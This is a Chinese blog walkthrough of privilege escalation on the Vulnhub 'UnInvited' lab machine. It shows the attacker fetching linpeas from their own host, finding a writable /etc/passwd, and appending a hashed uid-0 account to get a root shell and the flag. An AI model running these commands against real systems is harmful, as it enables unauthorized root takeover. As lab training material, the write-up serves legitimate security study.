Warning: Permanently added '[192.168.56.146]:7894' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Mar  4 14:46:34 IST 2023

  System load:                    0.0
  Usage of /:                     1.3% of 313.03GB
  Memory usage:                   35%
  Swap usage:                     0%
  Processes:                      128
  Users logged in:                0
  IP address for enp0s3:          192.168.56.146
  IP address for docker0:         172.17.0.1
  IP address for br-3a300780bc7a: 172.18.0.1

  => There is 1 zombie process.


287 packages can be updated.
176 updates are security updates.


#########################################################

             ____             ____  __ ________      .___
 __ __  ____/_   | _______  _/_   |/  |\_____  \   __| _/
|  |  \/    \|   |/    \  \/ /|   \   __\_(__  <  / __ | 
|  |  /   |  \   |   |  \   / |   ||  | /       \/ /_/ | 
|____/|___|  /___|___|  /\_/  |___||__|/______  /\____ | 
           \/         \/                      \/      \/ 


!!!!!!!!!!!!!!!!!!WECOME TO THE PARTY!!!!!!!!!!!!!!!!!!!!!


#########################################################



()()()()()()()()()()()()()()()()()()()()()()()()()()()()()



Last login: Fri Jul 31 10:36:15 2020 from 192.168.1.101
docksec@uninvited:~$ id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
docksec@uninvited:~$ 

docksec@uninvited:/home/jeevan$ cd /tmp
docksec@uninvited:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
--2023-03-04 14:50:16--  http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                      100%[=====================================================>] 747.87K  --.-KB/s    in 0.003s  

2023-03-04 14:50:16 (255 MB/s) - ‘linpeas.sh’ saved [765823/765823]

docksec@uninvited:/tmp$ chmod +x linpeas.sh
docksec@uninvited:/tmp$ ./linpeas.sh 

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d                                    
                                                                                                                              
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable                                                             
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No                                                                                  
═╣ Can I read shadow plists? ............ No                                                                                  
═╣ Can I write shadow plists? ........... No                                                                                  
═╣ Can I read opasswd file? ............. No                                                                                  
═╣ Can I write in network-scripts? ...... No                                                                                  
═╣ Can I read root folder? .............. No                  
──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41

创建一个密码,然后将密码以及用户名信息追加到/etc/passwd文件中。

ocksec@uninvited:/tmp$ echo 'jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' >> /etc/passwd
docksec@uninvited:/tmp$ su - jason
Password: 
root@uninvited:~# cd /root
root@uninvited:~# ls -alh
total 44K
drwx------  6 root root 4.0K Jul 29  2020 .
drwxr-xr-x 23 root root 4.0K Jul 28  2020 ..
-rw-------  1 root root 3.5K Jul 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Jul 29  2020 .cache
drwx------  3 root root 4.0K Jul 29  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Jul 28  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  3 root root 4.0K Jul 28  2020 ProjectX
-rw-r--r--  1 root root  376 Jul 28  2020 root.txt
-rw-r--r--  1 root root   66 Jul 28  2020 .selected_editor
root@uninvited:~# cat root.txt
             .__            .__  __             .___ 
 __ __  ____ |__| _______  _|___/  |_  ____   __| _/ 
|  |  \/    \|  |/    \  \/ |  \   ___/ __ \ / __ |  
|  |  |   |  |  |   |  \   /|  ||  | \  ___// /_/ |  
|____/|___|  |__|___|  /\_/ |__||__|  \___  \____ |  
           \/        \/                   \/     \/
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}
root@uninvited:~# 

最终拿到了root shell以及root flag.

标签:__,UnInvited,http,kali,56.146,192.168,Vulnhub,靶机,root
From: https://www.cnblogs.com/jason-huawen/p/17178745.html

相关文章

  • Vulnhub:Five86-2靶机
    kali:192.168.111.111靶机:192.168.111.211信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.211wpscan收集目标wordpress用户wpscan--url......
  • Vulnhub之View2akill靶机测试过程(部分)
    View2akill识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|......
  • vulnhub靶场之MATRIX-BREAKOUT: 2 MORPHEUS
    准备:攻击机:虚拟机kali、本机win10。靶机:Matrix-Breakout:2Morpheus,下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova,下载后直接......
  • 靶机练习6: BSS(Cute 1.0.2)
    靶机地址https://www.vulnhub.com/entry/bbs-cute-102,567/信息收集进行全端口扫描,确认目标开放端口和服务nmap-n-v-sS--max-retries=0-p-172.16.33.9对开放......
  • Hack the box靶机列表(类似OSCP lab的靶机)
     Linux的靶机列表Windows的靶机列表比OSCP更具挑战性的靶机列表,但值得练习2022年更新的靶机列表 5LamelegacyJeeves[Windows]Backdoor[Linux]  ......
  • OSCP练习靶机
    搞不到OSCP官方泄露的lab,只好搞一些有质量的、相似的靶机来练习首先感谢大哥的分享(34条消息)和oscp相似的靶机-hackthebox&vulnhub(OSCP-LIKEHACKTHEBOX&VULNHUB)......
  • [Vulnhub] MY FILE SERVER: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.40x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-A192.168.10.4......
  • [Vulnhub] DC: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.60x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-sC-sV-p-192.16......
  • 靶机练习5: Sar
    靶机地址https://www.vulnhub.com/entry/sar-1,425/信息收集阶段进行全端口扫描,枚举目标的端口和服务nmap-n-v-sS--max-retries=0-p-172.16.33.13nmap-sV-p......
  • 靶机练习4: SolidState
    信息收集阶段全端口扫描,查询目标靶机开放端口和服务sudonmap-p--n-v-sS--max-retries=0172.16.33.35进行服务版本扫描nmap-p22,25,80,110,119,4555-sV-A1......